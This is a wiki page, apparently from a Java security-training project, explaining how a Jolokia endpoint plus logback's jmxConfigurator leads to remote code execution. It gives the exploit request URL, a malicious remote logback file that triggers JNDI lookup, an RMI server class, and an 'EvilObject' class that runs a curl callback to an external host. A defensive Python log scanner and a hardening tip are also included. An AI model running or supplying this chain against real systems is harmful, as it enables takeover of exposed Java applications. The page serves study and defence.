Actuators to RCE
JoyChou edited this page Mar 4, 2019
Visiting http://localhost:8080/jolokia and getting a response does not by itself mean the application is vulnerable.
The XXE and RCE are only possible when logback is configured as follows:

- the file name must be `logback.xml`
- `jmxConfigurator` is configured

For example, the following logback.xml configuration:
```xml
<configuration>
    <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
        <withJansi>true</withJansi>
        <encoder>
            <pattern>[%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n</pattern>
        </encoder>
    </appender>
    <root level="info">
        <appender-ref ref="STDOUT" />
    </root>
    <jmxConfigurator/>
</configuration>
```
With that in place, the JMXConfigurator MBean's `reloadByURL` operation can be invoked through Jolokia to load a logback configuration from a remote URL:

```
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8888!/xxx.xml
```
Contents of xxx.xml:

```xml
<configuration>
    <insertFromJNDI env-entry-name="rmi://127.0.0.1:1099/refObj" as="appName"/>
</configuration>
```
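Added here as a defender-side check (an example written for this page, not code from the original wiki or the java-sec-code project): it audits a logback configuration for the `jmxConfigurator` precondition described above and scans access-log lines for Jolokia `reloadByURL` calls, undoing Jolokia's `!/` path escaping to recover the remote configuration URL. The combined access-log format and the sample log lines are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Jolokia GET URLs use "!" as the escape character: "!/" is a literal "/" and "!!" a
# literal "!", which is why the page's URL carries "http:!/!/127.0.0.1:8888!/xxx.xml".
def split_jolokia_path(path: str) -> list:
    """Split a Jolokia request path on unescaped '/' and unescape each segment."""
    segments, cur, chars = [], [], iter(path)
    for c in chars:
        if c == "!":
            cur.append(next(chars, ""))  # escaped character, taken literally
        elif c == "/":
            segments.append("".join(cur))
            cur = []
        else:
            cur.append(c)
    segments.append("".join(cur))
    return segments

# Request path of a Jolokia "exec" call in a combined-format access log line (assumed format).
JOLOKIA_EXEC_RE = re.compile(r'"(?:GET|POST) (/jolokia/exec/[^ "]+)')

def find_reload_by_url(log_text: str) -> list:
    """Return (client_ip, remote_config_url) for each JMXConfigurator reloadByURL call."""
    hits = []
    for line in log_text.splitlines():
        m = JOLOKIA_EXEC_RE.search(line)
        if not m:
            continue
        # ["", "jolokia", "exec", <mbean>, <operation>, <arg1>, ...]
        parts = split_jolokia_path(m.group(1))
        if len(parts) < 6 or "JMXConfigurator" not in parts[3] or parts[4] != "reloadByURL":
            continue
        hits.append((line.split(" ", 1)[0], parts[5]))
    return hits

def logback_has_jmx_configurator(logback_xml: str) -> bool:
    """True if the configuration registers the JMX configurator, the precondition above."""
    root = ET.fromstring(logback_xml)
    return root.tag == "jmxConfigurator" or root.find(".//jmxConfigurator") is not None

# Constructed sample log (not from the page): one benign request, one reloadByURL call.
SAMPLE_LOG = (
    '127.0.0.1 - - [04/Mar/2019:10:00:01 +0000] "GET /actuator/health HTTP/1.1" 200 15\n'
    '10.0.0.5 - - [04/Mar/2019:10:00:02 +0000] "GET /jolokia/exec/ch.qos.logback.classic:'
    'Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/'
    'http:!/!/10.0.0.5:8888!/xxx.xml HTTP/1.1" 200 88\n'
)
```

A configuration that passes the `logback_has_jmx_configurator` check should have the `<jmxConfigurator/>` element removed unless JMX reconfiguration is genuinely needed, and any `reloadByURL` hit pointing at an address the application does not own is worth an incident ticket.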
JNDI injection depends on the Java version; search Google, there are known techniques to bypass the restrictions of each version.
RMIServer.java

```java
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;

public class RMIServer {
    public static void main(String args[]) throws Exception {
        // RMI registry on port 1099, the address referenced by insertFromJNDI in xxx.xml
        Registry registry = LocateRegistry.createRegistry(1099);
        // JNDI Reference whose class is fetched from the HTTP server on port 8888
        Reference refObj = new Reference("EvilObject", "EvilObject", "http://127.0.0.1:8888/");
        ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
        System.out.println("Binding 'refObjWrapper' to 'rmi://127.0.0.1:1099/refObj'");
        registry.bind("refObj", refObjWrapper);
    }
}
```
EvilObject.java

```java
import java.lang.Runtime;
import java.lang.Process;

public class EvilObject {
    // Runs when the JNDI client instantiates the class it fetched from the HTTP server
    public EvilObject() {
        try {
            // Command to execute
            String commands = "curl http://rce.dnslog/joychou";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        EvilObject e = new EvilObject();
    }
}
```